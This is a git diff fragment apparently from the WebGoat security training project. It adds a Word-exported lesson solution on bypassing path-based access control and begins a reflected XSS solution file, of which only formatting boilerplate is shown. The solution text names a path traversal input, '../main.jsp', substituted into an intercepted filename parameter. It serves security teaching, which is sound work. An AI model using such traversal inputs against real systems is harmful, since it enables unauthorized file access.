+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p><b><span style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Bypass a Path Based Access
+Control Scheme <o:p></o:p></span></p>
+
+<p><b><span style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach:</span></b>
+<br>
+<span style='font-family:"Arial","sans-serif"'>In a path based access control scheme,
+an attacker can traverse a path by providing relative path information.
+Therefore an attacker can use relative paths to access files that normally are
+not directly accessible by anyone, or would otherwise be denied if requested
+directly. <o:p></o:p></span></p>
+
+<p><b><span style='font-family:"Arial","sans-serif"'>General Goal(s):</span></b>
+<br>
+<span style='font-family:"Arial","sans-serif"'>The user should be able to
+access a file that is not in the listed directory.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_457" o:spid="_x0000_i1027" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image002.jpg" v:shapes="Picture_x0020_457"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 8<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+can be solved by intercepting the filename in WebScarab and replacing it with
+../main.jsp which is a file located in a folder below the current directory.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_458"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image004.jpg" v:shapes="Picture_x0020_458"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Change the variable File<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_459"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/PathBasedAccessControl_files/image006.jpg" v:shapes="Picture_x0020_459"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>3</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lessen 8 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/filelist.xml b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/filelist.xml
new file mode 100644
index 000000000..496ea3696
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/filelist.xml
@@ -0,0 +1,12 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../PathBasedAccessControl.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image001.png b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image001.png
new file mode 100644
index 000000000..089968f01
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image002.jpg b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image002.jpg
new file mode 100644
index 000000000..4d4b17604
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image003.png b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image003.png
new file mode 100644
index 000000000..0bc317162
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image004.jpg b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image004.jpg
new file mode 100644
index 000000000..7978fe44b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image005.png b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image005.png
new file mode 100644
index 000000000..4f0de1d74
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image006.jpg b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image006.jpg
new file mode 100644
index 000000000..4d4491eb3
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/themedata.thmx b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/PathBasedAccessControl_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/ReflectedXSS.html b/main/project/WebContent/lesson_solutions/ReflectedXSS.html
new file mode 100644
index 000000000..cf6dc625d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/ReflectedXSS.html
@@ -0,0 +1,685 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/ReflectedXSS_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/ReflectedXSS_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>31</o:TotalTime>
+  <o:Created>2007-07-11T11:00:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:32:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>121</o:Words>
+  <o:Characters>694</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>5</o:Lines>
+  <o:Paragraphs>1</o:Paragraphs>
+  <o:CharactersWithSpaces>814</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/ReflectedXSS_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/ReflectedXSS_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
